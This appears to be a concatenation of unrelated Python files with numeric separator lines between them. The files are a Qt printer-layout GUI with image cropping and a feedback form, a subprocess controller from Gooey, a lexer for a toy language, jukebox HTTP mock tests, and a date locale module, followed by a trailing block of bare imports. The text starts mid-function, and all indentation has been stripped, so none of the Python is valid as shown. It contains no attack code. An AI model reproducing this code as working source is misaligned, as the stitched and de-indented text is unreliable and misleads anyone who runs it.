pi.bottom = p[1] - pi.height / 2
self.ensureImageInPrintLims(pi)
return pi
def copy(self):
if self.selection == None:
print("nothing to copy")
return
clipboard = QtGui.QApplication.clipboard()
clipboard.setPixmap(self.selection.pixmap)
def cut(self):
if self.selection == None:
print("nothing to cut")
return
self.copy()
self.images.remove(self.selection)
self.layoutChanged = True
self.update()
def delete(self):
if self.selection == None:
print("nothing to delete")
return
self.images.remove(self.selection)
self.layoutChanged = True
self.update()
def paste(self):
clipboard = QtGui.QApplication.clipboard()
if clipboard.mimeData().hasUrls():
url = str(clipboard.mimeData().urls()[0].path())
pi = self.addDroppedFile(url)
if pi != None:
self.selection = pi
return
if clipboard.mimeData().hasImage():
image = clipboard.mimeData().imageData().toPyObject()
fname = tempfile.mktemp() + ".png"
print("using temp file " + fname)
image.save(fname);
pi = self.addDroppedFile(fname)
if pi != None:
self.selection = pi
return
def crop(self):
if self.selection == None:
print("nothing to crop")
return
image = self.selection.pixmap.toImage()
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Cropping...")
progress.show()
total = image.height() * 2 + image.width() * 2
sofar = 0
nTop = 0
for j in range(0, image.height()):
rowIsEmpty = True
for i in range(0, image.width()):
blue = QtGui.qBlue(image.pixel(i, j))
if blue <= 200:
rowIsEmpty = False
break
if rowIsEmpty:
nTop = nTop + 1
else:
break
progress.setValue((sofar+j+1) * 100.0 / total)
QtGui.QApplication.processEvents()
sofar = image.height()
nWidth = image.width()
for i in range(0, image.width()):
colIsEmpty = True
for j in range(0, image.height()):
blue = QtGui.qBlue(image.pixel(image.width() - i - 1, j))
if blue <= 200:
colIsEmpty = False
break
if colIsEmpty:
nWidth = nWidth - 1
else:
break
progress.setValue((sofar+i+1) * 100.0 / total)
QtGui.QApplication.processEvents()
sofar += image.width()
nLeft = 0
for i in range(0, image.width()):
colIsEmpty = True
for j in range(0, image.height()):
blue = QtGui.qBlue(image.pixel(i, j))
if blue <= 200:
colIsEmpty = False
break
if colIsEmpty:
nLeft = nLeft + 1
else:
break
progress.setValue((sofar+i+1) * 100.0 / total)
QtGui.QApplication.processEvents()
sofar += image.width()
nHeight = image.height()
for j in range(0, image.height()):
rowIsEmpty = True
for i in range(0, image.width()):
blue = QtGui.qBlue(image.pixel(i, image.height() - j - 1))
if blue <= 200:
rowIsEmpty = False
break
if rowIsEmpty:
nHeight = nHeight - 1
else:
break
progress.setValue((sofar+j+1) * 100.0 / total)
QtGui.QApplication.processEvents()
progress.setValue(99.0)
QtGui.QApplication.processEvents()
nBottom = image.height() - nHeight
image = image.copy(nLeft, nTop, nWidth - nLeft, nHeight - nTop)
fname = tempfile.mktemp() + ".png"
print("using temp file " + fname)
image.save(fname);
progress.setValue(100.0)
QtGui.QApplication.processEvents()
self.images.remove(self.selection)
newImage = self.addImageFile(fname)
newImage.left = self.selection.left + nLeft / imageScale[0]
newImage.bottom = self.selection.bottom + nBottom / imageScale[1]
newImage.screenRect = None
self.layoutChanged = True
self.update()
def erode(self):
if self.selection == None:
print("nothing to erode")
return
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Eroding...")
progress.show()
image = self.selection.pixmap.toImage()
newImage = image.copy()
for j in range(image.height()):
for i in range(image.width()):
newImage.setPixel(i, j, 0xffffff)
for j in range(image.height()):
for i in range(image.width()):
if i == 0 or j == 0:
continue
if i+1 == image.width() or j+1 == image.height():
continue
if QtGui.qBlue(image.pixel(i , j )) > 200:
continue
if QtGui.qBlue(image.pixel(i-1, j-1)) > 200:
continue
if QtGui.qBlue(image.pixel(i-1, j )) > 200:
continue
if QtGui.qBlue(image.pixel(i-1, j+1)) > 200:
continue
if QtGui.qBlue(image.pixel(i+1, j-1)) > 200:
continue
if QtGui.qBlue(image.pixel(i+1, j )) > 200:
continue
if QtGui.qBlue(image.pixel(i+1, j+1)) > 200:
continue
if QtGui.qBlue(image.pixel(i , j-1)) > 200:
continue
if QtGui.qBlue(image.pixel(i , j+1)) > 200:
continue
newImage.setPixel(i, j, 0)
progress.setValue((j+1) * 100.0 / image.height())
QtGui.QApplication.processEvents()
self.selection.pixmap = QtGui.QPixmap.fromImage(newImage)
self.update()
def dilate(self):
if self.selection == None:
print("nothing to dilate")
return
image = self.selection.pixmap.toImage()
newImage = image.copy()
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Dilating...")
progress.show()
for j in range(image.height()):
for i in range(image.width()):
if QtGui.qBlue(image.pixel(i, j)) <= 200:
continue
if i == 0:
pass
elif i == image.width()-1:
pass
elif j == 0:
pass
elif j == image.height()-1:
pass
else:
if QtGui.qBlue(image.pixel(i-1, j-1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i-1, j )) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i-1, j+1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i+1, j-1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i+1, j )) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i+1, j+1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i , j-1)) <= 200:
newImage.setPixel(i, j, 0)
continue
if QtGui.qBlue(image.pixel(i , j+1)) <= 200:
newImage.setPixel(i, j, 0)
continue
progress.setValue((j+1) * 100.0 / image.height())
QtGui.QApplication.processEvents()
self.selection.pixmap = QtGui.QPixmap.fromImage(newImage)
self.update()
def invert(self):
if self.selection == None:
print("nothing to invert")
return
image = self.selection.pixmap.toImage()
newImage = image.copy()
progress = QtGui.QProgressDialog(self)
progress.setWindowTitle("Inverting...")
progress.show()
for j in range(image.height()):
for i in range(image.width()):
if QtGui.qBlue(image.pixel(i, j)) <= 200:
newImage.setPixel(i, j, 0xffffff)
else:
newImage.setPixel(i, j, 0)
progress.setValue((j+1) * 100.0 / image.height())
QtGui.QApplication.processEvents()
self.selection.pixmap = QtGui.QPixmap.fromImage(newImage)
self.update()
def alignLefts(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.left = self.selection.left
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def alignRights(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.left = self.selection.left + self.selection.width - self.selection2.width
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def alignTops(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.bottom = self.selection.bottom + self.selection.height - self.selection2.height
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def alignBottoms(self):
if self.selection == None:
print("nothing to align.")
return
if self.selection2 == None:
print("select two images to align.")
return
self.selection2.bottom = self.selection.bottom
self.selection2.screenRect = self.printAreaToScreen(self.selection2)
self.ensureImageInPrintLims(self.selection2)
self.update()
def openLayout(self, filename=None):
if self.closeLayout() == False:
return
if filename == None:
filename = str(QtGui.QFileDialog.getOpenFileName(self, 'Select a layout', self.argentum.filesDir, "Layouts (*.layout)"))
if filename == None:
return
file = open(filename, "r")
lines = file.read().split('\n')
file.close()
layoutPath = os.path.dirname(filename)
bImageSection = False
image = None
for line in lines:
if len(line) == 0:
continue
if line[0] == '#':
continue
if line[0] == '[':
bImageSection = False
if line == '[image]':
bImageSection = True
continue
if line.find('=') == -1:
# What is this?
continue
key = line[0:line.find('=')]
value = line[line.find('=')+1:]
if bImageSection:
if key == "filename":
if image:
self.ensureImageInPrintLims(image)
filename = value
if not os.path.isabs(filename):
filename = os.path.join(layoutPath, filename)
image = self.addImageFile(filename)
if image:
if key == "left":
image.left = float(value)
if key == "bottom":
image.bottom = float(value)
if key == "width":
image.width = float(value)
if key == "height":
image.height = float(value)
if key == "lastResized":
image.lastResized = float(value)
if image:
self.ensureImageInPrintLims(image)
self.layout = filename
self.update()
def saveLayout(self, filename=None):
if self.layout == None:
if filename == None:
filename = str(QtGui.QFileDialog.getSaveFileName(self, 'Save layout as', self.argentum.filesDir, "Layouts (*.layout)"))
if filename == None:
return
if filename.find('.layout') != len(filename)-7:
filename = filename + '.layout'
else:
filename = self.layout
# TODO we really need to create an archive of the control file
# and all the images used
#
# XXX Saves full pathnames. :(
file = open(filename, "w")
layoutPath = os.path.dirname(filename)
for image in self.images:
if image == self.printHeadImage:
continue
file.write('[image]\n')
path = os.path.relpath(image.filename, layoutPath)
if path.find('..') != -1:
path = image.filename
file.write('filename={}\n'.format(path))
file.write('left={}\n'.format(image.left))
file.write('bottom={}\n'.format(image.bottom))
file.write('width={}\n'.format(image.width))
file.write('height={}\n'.format(image.height))
if image.lastResized:
file.write('lastResized={}\n'.format(image.lastResized))
file.write('\n')
file.close()
self.layout = filename
self.layoutChanged = False
self.update()
return True
def closeLayout(self):
if len(self.images) == 1:
self.layout = None
self.layoutChanged = False
self.update()
return True
if self.layoutChanged:
answer = QtGui.QMessageBox.question(self, "Unsaved Changes",
"Would you like to save the current layout?",
(QtGui.QMessageBox.Save |
QtGui.QMessageBox.Discard |
QtGui.QMessageBox.Cancel))
if answer == QtGui.QMessageBox.Save:
if not self.saveLayout():
return False
elif answer == QtGui.QMessageBox.Cancel:
return False
self.images = [self.printHeadImage]
self.layout = None
self.layoutChanged = False
self.update()
return True
def checkImageChanges(self):
if self.printThread != None:
return
changed = []
for image in self.images:
if image == self.printHeadImage:
continue
modified = os.path.getmtime(image.filename)
if modified > image.lastLoaded and modified > self.lastCheckForChanges:
changed.append(image)
self.lastCheckForChanges = time.time()
if len(changed) == 0:
return
mb = QtGui.QMessageBox(QtGui.QMessageBox.Question,
"Outside Changes",
"One or more image files have been changed by an outside editor. Would you like to reload these images?\n\nWARNING: any modification you have made to the changed image(s) will be lost.",
(QtGui.QMessageBox.Yes |
QtGui.QMessageBox.No), self)
mb.setDetailedText("Changed files:\n{}".format('\n'.join(image.filename for image in changed)))
answer = mb.exec_()
if answer == QtGui.QMessageBox.No:
return
for image in changed:
image.pixmap = self.pixmapFromFilename(image.filename)
self.update()
def showImageListTriggered(self):
if self.argentum.showImageListAction.isChecked():
self.imageList.update()
self.imageList.show()
else:
self.imageList.hide()
# A kind of annoying Rect
# Note: (0,0) is the bottom left corner of the printer
# All measurements are in millimeters
class PrintRect:
def __init__(self, left, bottom, width, height):
self.left = float(left)
self.bottom = float(bottom)
self.width = float(width)
self.height = float(height)
class PrintImage(PrintRect):
def __init__(self, pixmap, filename):
self.pixmap = pixmap
self.filename = filename
self.left = 0.0
self.bottom = 0.0
self.width = pixmap.width() / imageScale[0]
self.height = pixmap.height() / imageScale[1]
self.lastLoaded = time.time()
self.lastResized = None
self.screenRect = None
self.visible = True
filename = os.path.basename(filename)
if filename.find('.') != -1:
filename = filename[:filename.find('.')]
self.hexFilename = filename + ".hex"
def pixmapRect(self):
return QtCore.QRectF(self.pixmap.rect())
class PrintCanceledException(Exception):
pass
class PrintOptionsDialog(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.setWindowTitle("Print Options")
mainLayout = QtGui.QVBoxLayout()
self.printView = parent
self.argentum = parent.argentum
layout = QtGui.QHBoxLayout()
layout.addWidget(QtGui.QLabel("Print each image"))
self.passes = QtGui.QSpinBox(self)
self.passes.setMinimum(1)
layout.addWidget(self.passes)
layout.addWidget(QtGui.QLabel("times"))
mainLayout.addLayout(layout)
self.useRollers = QtGui.QCheckBox("Dry the print after each pass")
self.useRollers.setChecked(self.argentum.getOption("use_rollers", False))
mainLayout.addWidget(self.useRollers)
self.alsoPause = QtGui.QCheckBox("Pause after each pass")
self.alsoPause.setChecked(self.argentum.getOption("also_pause", True))
mainLayout.addWidget(self.alsoPause)
layout = QtGui.QHBoxLayout()
cancelButton = QtGui.QPushButton("Cancel")
cancelButton.clicked.connect(self.reject)
layout.addWidget(cancelButton)
printButton = QtGui.QPushButton("Print")
printButton.clicked.connect(self.accept)
layout.addWidget(printButton)
mainLayout.addLayout(layout)
printButton.setDefault(True)
self.setLayout(mainLayout)
def getPasses(self):
return self.passes.value()
def getUseRollers(self):
return self.useRollers.isChecked()
def getAlsoPause(self):
return self.alsoPause.isChecked()
class PrintProgressDialog(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.printView = parent
mainLayout = QtGui.QVBoxLayout()
self.label = QtGui.QLabel("")
self.label.setAlignment(QtCore.Qt.AlignHCenter)
mainLayout.addWidget(self.label)
self.progressBar = QtGui.QProgressBar(self)
self.progressBar.setOrientation(QtCore.Qt.Horizontal)
mainLayout.addWidget(self.progressBar)
layout = QtGui.QHBoxLayout()
self.pauseButton = QtGui.QPushButton("Pause")
self.pauseButton.clicked.connect(self.pause)
layout.addWidget(self.pauseButton)
self.cancelButton = QtGui.QPushButton("Cancel")
self.cancelButton.clicked.connect(self.cancel)
layout.addWidget(self.cancelButton)
mainLayout.addLayout(layout)
self.cancelButton.setDefault(True)
self.setLayout(mainLayout)
self.paused = False
self.canceled = False
def wasCanceled(self):
return self.canceled
def setLabelText(self, text):
if text.startswith("Pass "):
self.setWindowTitle("Printing ({})".format(text[:text.find(':')]))
self.label.setText(text)
def setValue(self, value):
self.progressBar.setValue(value)
if value == 100:
self.hide()
def cancel(self):
self.canceled = True
def pause(self):
if self.paused:
self.paused = False
self.pauseButton.setText("Pause")
else:
self.paused = True
self.pauseButton.setText("Resume")
def closeEvent(self, e):
self.cancel()
class RateYourPrintDialog(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.setWindowTitle("Rate Your Print")
mainLayout = QtGui.QVBoxLayout()
self.argentum = parent.argentum
info = QtGui.QLabel("How was your print?")
mainLayout.addWidget(info)
mainLayout.addWidget(QtGui.QLabel(" "))
layout = QtGui.QHBoxLayout()
for n in range(1, 6):
label = QtGui.QLabel(str(n))
if n == 1:
label.setAlignment(QtCore.Qt.AlignLeft)
if n == 2:
label.setAlignment(QtCore.Qt.AlignLeft)
layout.addSpacing(45)
if n == 3:
label.setAlignment(QtCore.Qt.AlignHCenter)
if n == 4:
label.setAlignment(QtCore.Qt.AlignRight)
if n == 5:
layout.addSpacing(45)
label.setAlignment(QtCore.Qt.AlignRight)
layout.addWidget(label)
mainLayout.addLayout(layout)
self.slider = QtGui.QSlider(QtCore.Qt.Horizontal, self)
self.slider.setRange(1, 5)
self.slider.setValue(3)
self.slider.setTickInterval(1)
self.slider.setTickPosition(self.slider.TicksAbove)
mainLayout.addWidget(self.slider)
mainLayout.addWidget(QtGui.QLabel(" "))
info = QtGui.QLabel("Your feedback is important. Please let us know how we can make your print better.")
mainLayout.addWidget(info)
self.comments = QtGui.QTextEdit(self)
mainLayout.addWidget(self.comments)
layout = QtGui.QHBoxLayout()
info = QtGui.QLabel("Your printer number:")
layout.addWidget(info)
self.printerNum = QtGui.QLineEdit(self)
if self.argentum.getPrinterNumber():
self.printerNum.setText(self.argentum.getPrinterNumber())
layout.addWidget(self.printerNum)
self.printerNum.setToolTip("Look on the back of your printer.")
mainLayout.addLayout(layout)
self.wantContact = QtGui.QCheckBox("Contact me about this print")
self.wantContact.stateChanged.connect(self.contactMe)
mainLayout.addWidget(self.wantContact)
self.emailLayout = None
self.email = None
layout = QtGui.QHBoxLayout()
cancelButton = QtGui.QPushButton("Cancel")
cancelButton.clicked.connect(self.reject)
layout.addWidget(cancelButton)
self.sendButton = QtGui.QPushButton("Send Report")
self.sendButton.clicked.connect(self.sendReport)
layout.addWidget(self.sendButton)
mainLayout.addLayout(layout)
self.sendButton.setDefault(True)
self.setLayout(mainLayout)
def contactMe(self, state):
mainLayout = self.layout()
if state == QtCore.Qt.Unchecked:
if self.emailLayout:
mainLayout.removeItem(self.emailLayout)
self.yourEmailInfo.deleteLater()
self.email.deleteLater()
self.emailLayout.deleteLater()
self.yourEmailInfo = None
self.email = None
self.emailLayout = None
else:
self.emailLayout = QtGui.QHBoxLayout()
self.yourEmailInfo = QtGui.QLabel("Your email:")
self.emailLayout.addWidget(self.yourEmailInfo)
self.email = QtGui.QLineEdit(self)
if self.argentum.getEmail():
self.email.setText(self.argentum.getEmail())
self.emailLayout.addWidget(self.email)
mainLayout.insertLayout(mainLayout.count() - 1, self.emailLayout)
self.update()
def sendLoop(self):
firmware = ""
if self.argentum.printer != None:
firmware = self.argentum.printer.version
data = {"rate": self.rate,
"comments": self.commentText,
"installnum": self.argentum.getInstallNumber(),
"printernum": self.printerNumText,
"email": self.emailText,
"ts_processing_images": self.argentum.getTimeSpentProcessingImages(),
"ts_sending_files": self.argentum.getTimeSpentSendingFiles(),
"ts_printing": self.argentum.getTimeSpentPrinting(),
"version": BASEVERSION,
"firmware": firmware
}
r = requests.post("https://connect.cartesianco.com/feedback/print.php", data=data, verify=CA_CERTS)
print(r.text)
def sendReport(self):
self.sendButton.setText("Sending...")
self.printerNumText = str(self.printerNum.text())
self.emailText = ""
if self.email:
self.emailText = str(self.email.text())
if self.printerNumText != "":
self.argentum.setPrinterNumber(self.printerNumText)
if self.emailText != "" and self.emailText != self.argentum.getEmail():
self.argentum.setEmail(self.emailText)
self.rate = self.slider.sliderPosition()
self.commentText = str(self.comments.toPlainText())
updateThread = threading.Thread(target=self.sendLoop)
updateThread.start()
self.accept()
class ImageList(QtGui.QDialog):
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.parent = parent
self.setWindowTitle("Image List")
mainLayout = QtGui.QVBoxLayout()
self.imageList = QtGui.QListWidget(self)
self.imageList.setSelectionMode(QtGui.QAbstractItemView.NoSelection)
self.imageList.itemClicked.connect(self.itemClicked)
self.imageList.itemEntered.connect(self.itemEntered)
mainLayout.addWidget(self.imageList)
self.setLayout(mainLayout)
self.visibleIcon = QtGui.QIcon("visible.png")
self.notVisibleIcon = QtGui.QIcon("notvisible.png")
def update(self):
self.imageList.clear()
for image in self.parent.images:
if image == self.parent.printHeadImage:
continue
item = QtGui.QListWidgetItem(self.visibleIcon, os.path.basename(image.filename))
item.setData(QtCore.Qt.UserRole, image)
self.imageList.addItem(item)
QtGui.QDialog.update(self)
def itemClicked(self, item):
if item.icon().serialNumber() == self.visibleIcon.serialNumber():
item.setIcon(self.notVisibleIcon)
item.data(QtCore.Qt.UserRole).toPyObject().visible = False
else:
item.setIcon(self.visibleIcon)
item.data(QtCore.Qt.UserRole).toPyObject().visible = True
self.parent.update()
def itemEntered(self, item):
if self.imageList.currentItem() and self.imageList.currentItem() != item:
curImage = self.imageList.currentItem().data(QtCore.Qt.UserRole).toPyObject()
enterImage = item.data(QtCore.Qt.UserRole).toPyObject()
curImageIdx = self.parent.images.index(curImage)
enterImageIdx = self.parent.images.index(enterImage)
if enterImageIdx == curImageIdx + 1:
images = self.parent.images[:curImageIdx]
images.append(enterImage)
images.append(curImage)
if enterImageIdx + 1 != len(self.parent.images):
images.extend(self.parent.images[enterImageIdx+1:])
self.parent.images = images
self.parent.update()
self.update()
elif enterImageIdx == curImageIdx - 1:
images = self.parent.images[:enterImageIdx]
images.append(curImage)
images.append(enterImage)
if curImageIdx + 1 != len(self.parent.images):
images.extend(self.parent.images[curImageIdx+1:])
self.parent.images = images
self.parent.update()
self.update()
def closeEvent(self, e):
self.parent.argentum.showImageListAction.setChecked(False)
| 0.002709 |
import os
import re
import subprocess
from functools import partial
from multiprocessing.dummy import Pool
import sys
from gooey.gui.pubsub import pub
from gooey.gui.util.casting import safe_float
from gooey.gui.util.functional import unit, bind
from gooey.gui.util.taskkill import taskkill
class ProcessController(object):
def __init__(self, progress_regex, progress_expr):
self._process = None
self.progress_regex = progress_regex
self.progress_expr = progress_expr
def was_success(self):
self._process.communicate()
return self._process.returncode == 0
def poll(self):
if not self._process:
raise Exception('Not started!')
self._process.poll()
def stop(self):
if self.running():
taskkill(self._process.pid)
def running(self):
return self._process and self.poll() is None
def run(self, command):
env = os.environ.copy()
env["GOOEY"] = "1"
self._process = subprocess.Popen(
command.encode(sys.getfilesystemencoding()),
bufsize=1, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=True, env=env)
Pool(1).apply_async(self._forward_stdout, (self._process,))
def _forward_stdout(self, process):
'''
Reads the stdout of `process` and forwards lines and progress
to any interested subscribers
'''
while True:
line = process.stdout.readline()
if not line:
break
pub.send_message('console_update', msg=line)
pub.send_message('progress_update', progress=self._extract_progress(line))
pub.send_message('execution_complete')
def _extract_progress(self, text):
'''
Finds progress information in the text using the
user-supplied regex and calculation instructions
'''
# monad-ish dispatch to avoid the if/else soup
find = partial(re.search, string=text.strip())
regex = unit(self.progress_regex)
match = bind(regex, find)
result = bind(match, self._calculate_progress)
return result
def _calculate_progress(self, match):
'''
Calculates the final progress value found by the regex
'''
if not self.progress_expr:
return safe_float(match.group(1))
else:
return self._eval_progress(match)
def _eval_progress(self, match):
'''
Runs the user-supplied progress calculation rule
'''
_locals = {k: safe_float(v) for k, v in match.groupdict().items()}
if "x" not in _locals:
_locals["x"] = [safe_float(x) for x in match.groups()]
try:
return int(eval(self.progress_expr, {}, _locals))
except:
return None
| 0.008982 |
# lexer.py
#
# author: Christopher S. Corley
from swindle.lexeme import Lexeme
from swindle.types import (Types, get_type, PUNCTUATION)
from io import TextIOWrapper
class Lexer:
def __init__(self, fileptr):
# fileptr is generally a TextIOWrapper when reading from a file
self.fileptr = fileptr
self.done = False
self.comment_mode = False
self.need_terminator = False
# To emulate pushing things back to the stream
self.saved_char = None
# character is a generator so we can have nice reading things
# like next(self.character)
self.character = self.char_generator()
# line_no and col_no have special properties because we always want
# line 0 to be line 1.
@property
def line_no(self):
return self._line_no
@line_no.setter
def line_no(self, val):
self._line_no = val + 1
@property
def col_no(self):
return self._col_no
@col_no.setter
def col_no(self, val):
self._col_no = val + 1
def make_error(self, msg):
if type(self.fileptr) is TextIOWrapper:
exception_str = str(self.fileptr.name) + "\n"
else:
exception_str = str(type(self.fileptr)) + "\n\t"
exception_str += str(self.fileptr) + "\n"
exception_str += "Error on line " + str(self.line_no)
exception_str += ", character " + str(self.col_no)
exception_str += ": \n\t" + str(msg)
raise Exception(exception_str)
# a convenient way to count line numbers and read things character
# by character.
def char_generator(self):
for self.line_no, line in enumerate(self.fileptr):
for self.col_no, char in enumerate(line):
self.saved_char = None
yield char
# returning None will represent an EOF marker, but also make looping
# easy since loops stop on None or False
def get_next_char(self):
if self.saved_char:
c = self.saved_char
self.saved_char = None
else:
try:
c = next(self.character)
except StopIteration:
self.done = True
return None
return c
def skip_whitespace(self):
# skip_whitespace will do just that, but in swindle we need the
# extra property of tokenizing the whitespace at the beginning
# of a line as well. So, this will either return a whitespace
# Lexeme or None.
c = self.get_next_char()
while c:
if self.comment_mode:
if c == '\n':
self.comment_mode = False
if self.need_terminator:
self.need_terminator = False
return Lexeme(c,
self.line_no,
self.col_no)
elif c == '#':
self.comment_mode = True
elif c == ' ':
pass
elif c == '\n':
# begin tokenizing whitespace for indent
self.comment_mode = False
if self.need_terminator:
self.need_terminator = False
return Lexeme(c,
self.line_no,
self.col_no)
else:
self.saved_char = c
return None
c = self.get_next_char()
return None
# Will return None if there are no characters left.
def lex(self):
ws_token = self.skip_whitespace()
if ws_token:
return ws_token
c = self.get_next_char()
if c:
if ( c == '('
or c == ')'
or c == ':'
or c == '`'
or c == '.'
or c == '['
or c == ']'):
self.need_terminator = True
return Lexeme(c, self.line_no, self.col_no)
elif c.isdigit():
self.saved_char = c
self.need_terminator = True
return self.lex_number()
elif c.isalpha():
self.saved_char = c
self.need_terminator = True
return self.lex_id_or_keyword()
elif c == '"':
self.saved_char = c
self.need_terminator = True
return self.lex_string()
else:
raise Exception("Unknown token found")
return Lexeme(c,
self.line_no,
self.col_no,
unknown=True)
return None
def lex_number(self):
cstr = self.get_next_char()
c = self.get_next_char()
while c.isdigit():
cstr += c
c = self.get_next_char()
if (c not in PUNCTUATION
and c != ' '
and c != '\n'):
self.make_error("Variable names must begin with a letter.")
self.saved_char = c
return Lexeme(cstr, self.line_no, self.col_no)
def lex_id_or_keyword(self):
# we already know the saved_char contains the first letter of
# the id or keyword, so get it back off again.
cstr = self.get_next_char()
c = self.get_next_char()
while c and (c.isalpha()
or c.isdigit()
or c == "_"
# for the set! keyword
or c == "!"):
cstr += c
c = self.get_next_char()
if c and (c not in PUNCTUATION
and c != ' '
and c != '\n'):
self.make_error("Variable names cannot contain character " + c)
self.saved_char = c
return Lexeme(cstr, self.line_no, self.col_no)
def lex_string(self):
cstr = self.get_next_char() # if we want to collect beginning "
# which we do, because we want to have an easy way for Lexeme
# to detect the string literal
c = self.get_next_char()
while c:
if c == '\\':
# this will allow us to grab any escaped character
cstr += c
c = self.get_next_char()
elif c == '"':
cstr += c # if we want to collect ending "
return Lexeme(cstr, self.line_no, self.col_no)
cstr += c
c = self.get_next_char()
| 0.00464 |
import mock
import twisted.web.server
import jukebox.httpd
def test_stream_get():
request = mock.Mock(name='request')
source = mock.Mock(name='source', spec=jukebox.httpd.Source)
Client = mock.Mock(name='Client')
stream = jukebox.httpd.Stream(source, Client)
result = stream.render_GET(request)
assert twisted.web.server.NOT_DONE_YET == result
Client.assert_called_with(request)
source.add_client.assert_called_with(Client.return_value)
def test_client_init():
request = mock.Mock(name='request')
jukebox.httpd.Client(request)
request.setHeader.assert_called_with('Content-Type', 'audio/mpeg')
def test_client_send():
request = mock.Mock(name='request')
client = jukebox.httpd.Client(request)
client.send('foo')
request.write.assert_called_with('foo')
def test_source_init_start_song_callback():
playlist = mock.Mock(name='playlist', cur=None)
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
playlist.add_listener.assert_called_with(source.start_new_song)
def test_add_client_send():
playlist = mock.Mock(name='playlist', cur=None)
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
client = mock.Mock(name='client')
source.add_client(client)
source.send('foo')
client.send.assert_called_with('foo')
def test_source_new_song():
playlist = mock.Mock(name='playlist')
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
source.start_new_song('NEW_CUR')
encoder.assert_called_with(
song=playlist.cur,
data_callback=source.send,
)
encoder.return_value.encode.assert_called()
def test_source_not_new_song():
playlist = mock.Mock(name='playlist')
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
source.start_new_song('FOO')
assert not encoder.called
def test_source_new_song_empty_playlist():
playlist = mock.Mock(name='playlist', cur=None)
encoder = mock.Mock(name='encoder')
source = jukebox.httpd.Source(playlist, encoder)
source.start_new_song('NEW_CUR')
assert not encoder.called
| 0 |
""" Locale dependant formatting and parsing.
XXX This module still has prototype status and is undocumented.
XXX Check the spelling.
XXX Check the string format.
Copyright (c) 1998-2000, Marc-Andre Lemburg; mailto:[email protected]
Copyright (c) 2000-2001, eGenix.com Software GmbH; mailto:[email protected]
See the documentation for further information on copyrights,
or contact the author. All Rights Reserved.
"""
def _make_dict(*names):
""" Helper to create a dictionary mapping indices to
names and names to indices.
"""
d = {}
for i in range(len(names)):
d[names[i]] = i
d[i] = names[i]
return d
class _TimeLocale:
""" Base class for locale dependend formatting and parsing.
"""
# Examples:
Weekday = _make_dict('Monday','Tuesday','Wednesday','Thursday','Friday',
'Saturday','Sunday')
Month = _make_dict(None,
'January','February','March','April','May','June',
'July','August','September','October','November','December')
# Instance variables
MonthNames = ()
WeekdayNames = ()
def __init__(self):
""" Init. the instance variables.
"""
l = []
for i in range(1,13):
l.append(self.Month[i])
self.MonthNames = tuple(l)
l = []
for i in range(7):
l.append(self.Weekday[i])
self.WeekdayNames = tuple(l)
def str(self,d):
"""str(datetime)
Return the given DateTime instance formatted according to
the locale's convention. Timezone information is not
presented.
"""
return '%s %02i %s %04i %02i:%02i:%02i' % (
self.Weekday[d.day_of_week],
d.day,self.Month[d.month],d.year,
d.hour,d.minute,d.second)
# Alias
ctime = str
# Singletons that implement the specific methods.
class English(_TimeLocale):
Weekday = _make_dict('Monday','Tuesday','Wednesday','Thursday','Friday',
'Saturday','Sunday')
Month = _make_dict(None,
'January','February','March','April','May','June',
'July','August','September','October','November','December')
English = English()
class German(_TimeLocale):
Weekday = _make_dict('Montag','Dienstag','Mittwoch','Donnerstag',
'Freitag','Samstag','Sonntag')
Month = _make_dict(None,
'Januar','Februar','März','April','Mai','Juni',
'Juli','August','September','Oktober','November','Dezember')
German = German()
class French(_TimeLocale):
Weekday = _make_dict('lundi','mardi','mercredi','jeudi',
'vendredi','samedi','dimanche')
Month = _make_dict(None,
'janvier','février','mars','avril','mai','juin',
'juillet','août','septembre','octobre','novembre','décembre')
French = French()
class Spanish(_TimeLocale):
Weekday = _make_dict('lunes','martes','miercoles','jueves','viernes',
'sabado','domingo')
Month = _make_dict(None,
'enero','febrero','marzo','abril','mayo','junio',
'julio','agosto','septiembre','octubre','noviembre','diciembre')
Spanish = Spanish()
class Portuguese(_TimeLocale):
Weekday = _make_dict('primeira feira', 'segunda feira','terceira feira',
'cuarta feira','quinta feira','sabado','domingo')
Month = _make_dict(None,
'janeiro','fevereiro','mar','abril','maio','junho',
'julho','agosto','septembro','outubro','novembro','dezembro')
Portuguese = Portuguese()
###
def _test():
import DateTime
d = DateTime.now()
for lang in (English,German,French,Spanish,Portuguese):
print lang.__class__.__name__,':',lang.ctime(d)
if __name__ == '__main__':
_test()
| 0.034412 |
import socket
import requests
from lxml.html import fromstring
import datetime
import sys
import ipaddress
import threading
import os
